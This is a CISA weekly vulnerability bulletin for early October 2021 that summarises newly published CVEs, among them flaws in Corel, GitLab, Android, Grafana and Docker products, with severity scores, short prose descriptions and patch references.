Vulnerability Summary for the Week of October 4, 2021

Released
Oct 11, 2021
Document ID
SB21-284

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


 

High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
archibus -- web_central** UNSUPPORTED WHEN ASSIGNED ** In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assign a session token that could be already in use by another user. It was therefore possible to access the application through a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token, client-side, simply by making an unauthenticated GET Request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token, continuing to keep the inserted one, as the identifier of the entire session. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.2021-10-057.5CVE-2021-41553
MISC
aviatorscript_project -- aviatorscriptAviatorScript through 5.2.7 allows code execution via an expression that is encoded with Byte Code Engineering Library (BCEL).2021-10-027.5CVE-2021-41862
MISC
commonwl -- cwlviewercwlviewer is a web application to view and share Common Workflow Language workflows. Versions prior to 1.3.1 contain a Deserialization of Untrusted Data vulnerability. Commit number f6066f09edb70033a2ce80200e9fa9e70a5c29de (dated 2021-09-30) contains a patch. There are no available workarounds aside from installing the patch. The SnakeYaml constructor, by default, allows any data to be parsed. To fix the issue the object needs to be created with a `SafeConstructor` object, as seen in the patch.2021-10-017.5CVE-2021-41110
MISC
MISC
CONFIRM
corel -- pdf_fusionCoreip.dll in Corel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.2021-10-019.3CVE-2021-38096
MISC
MISC
corel -- pdf_fusionCorel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.2021-10-019.3CVE-2021-38097
MISC
MISC
corel -- photopaint_2020CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38101.2021-10-019.3CVE-2021-38099
MISC
MISC
corel -- presentations_2020IBJPG2.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.2021-10-019.3CVE-2021-38103
MISC
MISC
dell -- isilon_insightiq_firmwareDell EMC InsightIQ, versions prior to 4.1.4, contain risky cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to authentication bypass and remote takeover of the InsightIQ. This allows an attacker to take complete control of InsightIQ to affect services provided by SSH; so Dell recommends customers to upgrade at the earliest opportunity.2021-10-017.5CVE-2021-36298
MISC
galera -- galera_webtemplateGalera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.2021-10-017.5CVE-2021-40960
MISC
MISC
getcomposer -- composerComposer is an open source dependency manager for the PHP language. In affected versions windows users running Composer to install untrusted dependencies are subject to command injection and should upgrade their composer version. Other OSs and WSL are not affected. The issue has been resolved in composer versions 1.10.23 and 2.1.9. There are no workarounds for this issue.2021-10-057.5CVE-2021-41116
MISC
CONFIRM
hotel_and_lodge_booking_management_system_project -- hotel_and_lodge_booking_management_systemSourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.2021-10-017.5CVE-2020-21012
MISC
lodging_reservation_management_system_project -- lodging_reservation_management_systemThe username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.2021-10-047.5CVE-2021-41511
MISC
MISC
MISC
online-shopping-system-advanced_project -- online-shopping-system-advancedAn un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.2021-10-017.5CVE-2021-41649
MISC
ptcl -- hg150-ub_firmwareAn issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path.2021-10-047.5CVE-2021-35296
MISC
qnap -- qvrA command injection vulnerability has been reported to affect QNAP device running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210902 and later2021-10-017.5CVE-2021-34352
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
3xlogic -- infinias_access_controlAn issue was discovered in 3xLogic Infinias Access Control through 6.7.10708.0, affecting physical security. Users with login credentials assigned to a specific zone can send modified HTTP GET and POST requests, allowing them to view user data such as personal information and Prox card credentials. Also, an authorized user of one zone can send API requests to unlock electronic locks associated with zones they are unauthorized to have access to. They can also create new user logins for zones they were not authorized to access, including the root zone of the software.2021-10-016.5CVE-2021-41847
MISC
MISC
MISC
53kf -- 53kfCross site scripting vulnerability in 53KF < 2.0.0.2 that allows for arbitrary code to be executed via crafted HTML statement inserted into chat window.2021-10-044.3CVE-2020-28119
MISC
afian -- filerunAfian FileRun 2021.03.26 allows stored XSS via an HTTP X-Forwarded-For header that is mishandled when rendering Activity Logs.2021-10-054.3CVE-2021-35503
MISC
MISC
afian -- filerunAfian FileRun 2021.03.26 allows XSS when an administrator encounters a crafted document during use of the HTML Editor for a preview or edit action.2021-10-054.3CVE-2021-35506
MISC
MISC
alfred-spotify-mini-player -- alfred_spotify_mini_playerCross-site scripting (XSS) vulnerability in callback.php in Spotify-for-Alfred 0.13.9 and below allows remote attackers to inject arbitrary web script or HTML via the error parameter.2021-10-014.3CVE-2021-40927
MISC
MISC
archibus -- web_central** UNSUPPORTED WHEN ASSIGNED ** In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.2021-10-054.3CVE-2021-41555
MISC
archibus -- web_central** UNSUPPORTED WHEN ASSIGNED ** ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints: /archibus/schema/ab-edit-users.axvw, /archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.2021-10-056.5CVE-2021-41554
MISC
bosch -- rexroth_indramotion_mlc_l20_firmwareThe web server is vulnerable to reflected XSS and therefore an attacker might be able to execute scripts on a client’s computer by sending the client a manipulated URL.2021-10-044.3CVE-2021-23856
CONFIRM
canonical -- apportAn information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;2021-10-014.7CVE-2021-3710
MISC
MISC
MISC
MISC
canonical -- multipassThe Windows version of Multipass before 1.7.0 allowed any local process to connect to the localhost TCP control socket to perform mounts from the operating system to a guest, allowing for privilege escalation.2021-10-014.6CVE-2021-3626
MISC
canonical -- multipassThe MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner.2021-10-014.6CVE-2021-3747
MISC
codesolz -- better_find_and_replaceThe Better Find and Replace WordPress plugin before 1.2.9 does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue2021-10-044.3CVE-2021-24676
MISC
coinmarketstats -- woo-altcoin-payment-gatewayThe Bitcoin / AltCoin Payment Gateway for WooCommerce WordPress plugin before 1.6.1 does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue2021-10-044.3CVE-2021-24679
MISC
concrete5-legacy_project -- concrete5-legacyCross-site scripting (XSS) vulnerability in toos/permissions/dialogs/access/entity/types/group_combination.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the cID parameter.2021-10-014.3CVE-2021-41463
MISC
MISC
concrete5-legacy_project -- concrete5-legacyCross-site scripting (XSS) vulnerability in concrete/elements/collection_theme.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the rel parameter.2021-10-014.3CVE-2021-41465
MISC
MISC
concrete5-legacy_project -- concrete5-legacyCross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the rel parameter.2021-10-014.3CVE-2021-41464
MISC
MISC
concrete5-legacy_project -- concrete5-legacyCross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the ctID parameter.2021-10-014.3CVE-2021-41462
MISC
MISC
concrete5-legacy_project -- concrete5-legacyCross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the mode parameter.2021-10-014.3CVE-2021-41461
MISC
MISC
corel -- coreldraw_2020CdrCore.dll in Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file.2021-10-024.3CVE-2021-38107
MISC
MISC
corel -- coreldraw_2020Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file.2021-10-024.3CVE-2021-38109
MISC
MISC
corel -- pdf_fusionCorel PDF Fusion 2.6.2.0 is affected by a Heap Corruption vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.2021-10-016.8CVE-2021-38098
MISC
MISC
corel -- photopaint_2020Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file.2021-10-016.8CVE-2021-38100
MISC
MISC
corel -- photopaint_2020CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38099.2021-10-016.8CVE-2021-38101
MISC
MISC
corel -- presentations_2020IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38102.2021-10-014.3CVE-2021-38105
MISC
MISC
corel -- presentations_2020IPPP72.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.2021-10-014.3CVE-2021-38104
MISC
MISC
corel -- presentations_2020UAX200.dll in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.2021-10-014.3CVE-2021-38106
MISC
MISC
corel -- presentations_2020IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38105.2021-10-014.3CVE-2021-38102
MISC
MISC
corel -- wordperfect_2020Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file.2021-10-024.3CVE-2021-38108
MISC
MISC
corel -- wordperfect_2020Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file.2021-10-016.8CVE-2021-38110
MISC
MISC
dell -- enterprise_sonic_osDell Enterprise SONiC OS, versions 3.3.0 and earlier, contains a sensitive information disclosure vulnerability. An authenticated malicious user with access to the system may use the TACACS\Radius credentials stored to read sensitive information and use it in further attacks.2021-10-014CVE-2021-36309
MISC
detector_project -- detectorCross-site scripting (XSS) vulnerability in _contactform.inc.php in Detector 0.8.5 and below version allows remote attackers to inject arbitrary web script or HTML via the cid parameter.2021-10-014.3CVE-2021-40921
MISC
docker -- command_line_interfaceDocker CLI is the command line interface for the docker container runtime. A bug was found in the Docker CLI where running `docker login my-private-registry.example.com` with a misconfigured configuration file (typically `~/.docker/config.json`) listing a `credsStore` or `credHelpers` that could not be executed would result in any provided credentials being sent to `registry-1.docker.io` rather than the intended private registry. This bug has been fixed in Docker CLI 20.10.9. Users should update to this version as soon as possible. For users unable to update ensure that any configured credsStore or credHelpers entries in the configuration file reference an installed credential helper that is executable and on the PATH.2021-10-045CVE-2021-41092
MISC
CONFIRM
ecommerce-codeigniter-bootstrap_project -- ecommerce-codeigniter-bootstrapCross-site scripting (XSS) vulnerability in application/modules/admin/views/ecommerce/products.php in Ecommerce-CodeIgniter-Bootstrap (Codeigniter 3.1.11, Bootstrap 3.3.7) allows remote attackers to inject arbitrary web script or HTML via the search_title parameter.2021-10-014.3CVE-2021-40975
MISC
emlog -- emlogemlog v6.0.0 contains a SQL injection via /admin/comment.php.2021-10-016.5CVE-2020-21013
MISC
emlog -- emlogemlog v6.0.0 contains an arbitrary file deletion vulnerability in admin/plugin.php.2021-10-015.5CVE-2020-21014
MISC
esri -- portal_for_arcgisThere is an privilege escalation vulnerability in organization-specific logins in Esri Portal for ArcGIS versions 10.9 and below that may allow a remote, authenticated attacker to impersonate another account.2021-10-016.5CVE-2021-29108
CONFIRM
esri -- portal_for_arcgisA reflected XSS vulnerability in Esri Portal for ArcGIS version 10.9 and below may allow a remote attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the user’s browser.2021-10-014.3CVE-2021-29109
CONFIRM
faveohelpdesk -- faveoCross-site scripting (XSS) vulnerability in dompdf/dompdf/www/demo.php infaveo-helpdesk v1.11.0 and below allow remote attackers to inject arbitrary web script or HTML via the $_SERVER["PHP_SELF"] parameter.2021-10-014.3CVE-2021-40925
MISC
MISC
getid3 -- getid3Cross-site scripting (XSS) vulnerability in demos/demo.mysqli.php in getID3 1.X and v2.0.0-beta allows remote attackers to inject arbitrary web script or HTML via the showtagfiles parameter.2021-10-014.3CVE-2021-40926
MISC
MISC
gitlab -- gitlabThe project import/export feature in GitLab 8.9 and greater could be used to obtain otherwise private email addresses2021-10-054CVE-2021-22258
CONFIRM
MISC
MISC
gitlab -- gitlabA potential DOS vulnerability was discovered in GitLab EE starting with version 12.6 due to lack of pagination in dependencies API.2021-10-044CVE-2021-22259
MISC
CONFIRM
gitlab -- gitlabIn all versions of GitLab CE/EE since version 8.0, access tokens created as part of admin's impersonation of a user are not cleared at the end of impersonation which may lead to unnecessary sensitive info disclosure.2021-10-054CVE-2021-39891
MISC
CONFIRM
gitlab -- gitlabIn all versions of GitLab EE since version 14.1, due to an insecure direct object reference vulnerability, an endpoint may reveal the protected branch name to a malicious user who makes a crafted API call with the ID of the protected branch.2021-10-054CVE-2021-39889
MISC
MISC
CONFIRM
gitlab -- gitlabPermissions rules were not applied while issues were moved between projects of the same group in GitLab versions starting with 10.6 and up to 14.1.7 allowing users to read confidential Epic references.2021-10-054CVE-2021-39886
MISC
CONFIRM
gitlab -- gitlabA Denial Of Service vulnerability in the apollo_upload_server Ruby gem in GitLab CE/EE version 11.11 and above allows an attacker to deny access to all users via specially crafted requests to the apollo_upload_server middleware.2021-10-054CVE-2021-39880
CONFIRM
MISC
MISC
gitlab -- gitlabIn all versions of GitLab CE/EE since version 11.11, an instance that has the setting to disable Repo by URL import enabled is bypassed by an attacker making a crafted API call.2021-10-054CVE-2021-39870
MISC
MISC
CONFIRM
gitlab -- gitlabAn issue has been discovered in GitLab affecting all versions starting from 14.0 before 14.0.9, all versions starting from 14.1 before 14.1.4, all versions starting from 14.2 before 14.2.2. The route for /user.keys is not restricted on instances with public visibility disabled. This allows user enumeration on such instances.2021-10-055CVE-2021-22257
MISC
CONFIRM
gitlab -- gitlabMissing access control in GitLab version 13.10 and above with Jira Cloud integration enabled allows Jira users without administrative privileges to add and remove Jira Connect Namespaces via the GitLab.com for Jira Cloud application configuration page2021-10-055CVE-2021-22262
CONFIRM
MISC
MISC
gitlab -- gitlabA potential DOS vulnerability was discovered in GitLab starting with version 9.1 that allowed parsing files without authorisation.2021-10-055CVE-2021-39893
MISC
CONFIRM
gitlab -- gitlabAn issue has been discovered in GitLab affecting all versions starting from 13.8 before 14.0.9, all versions starting from 14.1 before 14.1.4, all versions starting from 14.2 before 14.2.2. Under specialized conditions, an invited group member may continue to have access to a project even after the invited group, which the member was part of, is deleted.2021-10-054.3CVE-2021-22264
CONFIRM
MISC
glimmrtv -- flextvCross-site scripting (XSS) vulnerability in index.php in FlexTV beta development version allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF parameter.2021-10-014.3CVE-2021-40928
MISC
MISC
google -- androidIn sendBroadcastToInstaller of FirstScreenBroadcast.java, there is a possible activity launch due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-1792897532021-10-064.6CVE-2021-0692
MISC
google -- androidIn the SELinux policy configured in system_app.te, there is a possible way for system_app to gain code execution in other processes due to an overly-permissive SELinux policy. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-1885540482021-10-064.6CVE-2021-0691
MISC
google -- androidWhen extracting the incorrectly formatted avi file, the memory is damaged, the playback interface shows that the video cannot be played, and the log is found to be crashed. This problem may lead to hacker malicious code attacks, resulting in the loss of user rights.Product: Androidversion: Android-10Android ID: A-1893924232021-10-066.8CVE-2021-0636
MISC
google -- androidIn ParsedIntentInfo of ParsedIntentInfo.java, there is a possible parcel serialization/deserialization mismatch due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-1910553532021-10-064.6CVE-2021-0685
MISC
google -- androidIn TouchInputMapper::sync of TouchInputMapper.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-1798396652021-10-064.6CVE-2021-0684
MISC
google -- androidWhen extracting the incorrectly formatted flv file, the memory is damaged, the playback interface shows that the video cannot be played, and the log is found to be crashed. This problem may lead to hacker malicious code attacks, resulting in the loss of user rights.Product: Androidversion:Android-10Android ID: A-1894024772021-10-066.8CVE-2021-0635
MISC
google -- androidIn runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-1853989422021-10-064.6CVE-2021-0683
MISC
google -- androidIn ih264d_mark_err_slice_skip of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-1821527572021-10-064.3CVE-2021-0690
MISC
google -- androidIn lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-1774570962021-10-064.6CVE-2021-0595
MISC
google -- androidIn onCreate of ConfirmConnectActivity.java, there is a possible pairing of untrusted Bluetooth devices due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-1804221082021-10-064.4CVE-2021-0598
MISC
google -- androidIn lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-1611495432021-10-064.4CVE-2021-0688
MISC
gpac -- mp4boxThere is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1008 in the nhmldmx_send_sample() function szXmlFrom parameter which leads to a denial of service vulnerability.2021-10-015CVE-2021-41459
MISC
gpac -- mp4boxThere is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1004 in the nhmldmx_send_sample() function szXmlTo parameter which leads to a denial of service vulnerability.2021-10-015CVE-2021-41456
MISC
gpac -- mp4boxThere is a stack buffer overflow in MP4Box 1.1.0 at src/filters/dmx_nhml.c in nhmldmx_init_parsing which leads to a denial of service vulnerability.2021-10-015CVE-2021-41457
MISC
grafana -- grafanaGrafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot "public_mode" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot "public_mode" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.2021-10-056.8CVE-2021-39226
MISC
MISC
CONFIRM
MISC
MLIST
hkurl -- i-panel_administration_systemA reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console and it is possible to insert a vulnerable malicious button.2021-10-044.3CVE-2021-41878
MISC
MISC
ibm -- sterling_b2b_integratorIBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to perform actions that they should not be able to access due to improper access controls. IBM X-Force ID: 202169.2021-10-064CVE-2021-29758
CONFIRM
XF
ibm -- sterling_b2b_integratorIBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to download unauthorized files through the dashboard user interface. IBM X-Force ID: 202213.2021-10-064CVE-2021-29760
CONFIRM
XF
ibm -- sterling_b2b_integratorIBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information from the dashboard that they should not have access to. IBM X-Force ID: 202265.2021-10-064CVE-2021-29761
CONFIRM
XF
jizhicms -- jizhicmsJIZHICMS 1.5.1 contains a cross-site scripting (XSS) vulnerability in the component /user/release.html, which allows attackers to arbitrarily add an administrator cookie.2021-10-014.3CVE-2020-21228
MISC
MISC
MISC
justwriting_project -- justwritingCross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.2021-10-014.3CVE-2021-41467
MISC
MISC
linux -- linux_kernelprealloc_elems_and_freelist in kernel/bpf/stackmap.c in the Linux kernel through 5.14.9 allows unprivileged users to trigger an eBPF multiplication integer overflow with a resultant out-of-bounds write.2021-10-024.6CVE-2021-41864
MISC
MISC
FEDORA
maccms -- maccmsA Cross-Site Request Forgery (CSRF) in the component admin.php/admin/type/info.html of Maccms 10 allows attackers to gain administrator privileges.2021-10-046.8CVE-2020-21386
MISC
maccms -- maccmsA cross-site scripting (XSS) vulnerability in the parameter type_en of Maccms 10 allows attackers to obtain the administrator cookie and escalate privileges via a crafted payload.2021-10-044.3CVE-2020-21387
MISC
mcafee -- drive_encryptionPrivilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.2021-10-014.6CVE-2021-23893
CONFIRM
meowapps -- media_file_renamer_-_auto_\&_manual_renameCross-Site Request Forgery (CSRF) vulnerability in WordPress Media File Renamer – Auto & Manual Rename plugin (versions <= 5.1.9). Affected parameters "post_title", "filename", "lock". This allows changing the uploaded media title, media file name, and media locking state.2021-10-044.3CVE-2021-36850
CONFIRM
MISC
meowapps -- meow_galleryThe Meow Gallery WordPress plugin before 4.1.9 does not sanitise, validate or escape the ids attribute of its gallery shortcode (available for users as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and arbitrary objects to be deserialized.2021-10-045.5CVE-2021-24465
MISC
mobyproject -- mobyMoby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where attempting to copy files using `docker cp` into a specially-crafted container can result in Unix file permission changes for existing files in the host’s filesystem, widening access to others. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers do not need to be restarted.2021-10-044.4CVE-2021-41089
MISC
CONFIRM
mysurvey -- survey_solutionsSurvey Solutions is a survey management and data collection system. In affected versions the Headquarters application publishes /metrics endpoint available to any user. None of the survey answers are ever exposed, only the aggregate counters, including count of interviews, or count of assignments. Starting from version 21.09.1 the endpoint is turned off by default.2021-10-045CVE-2021-41123
MISC
CONFIRM
omikron -- multicashOmikron MultiCash Desktop 4.00.008.SP5 relies on a client-side authentication mechanism. When a user logs into the application, the validity of the password is checked locally. All communication to the database backend is made via the same technical account. Consequently, an attacker can attach a debugger to the process or create a patch that manipulates the behavior of the login function. When the function always returns the success value (corresponding to a correct password), an attacker can login with any desired account, such as the administrative account of the application.2021-10-054.6CVE-2021-41286
MISC
online-shopping-system-advanced_project -- online-shopping-system-advancedAn un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.2021-10-015CVE-2021-41648
MISC
MISC
online_food_ordering_web_app_project -- online_food_ordering_web_appAn un-authenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user.2021-10-016.4CVE-2021-41647
MISC
MISC
MISC
MISC
pardus -- liderahenkOn 2.1.15 version and below of Lider module in LiderAhenk software is leaking it's configurations via an unsecured API. An attacker with an access to the configurations API could get valid LDAP credentials.2021-10-015CVE-2021-3825
CONFIRM
CONFIRM
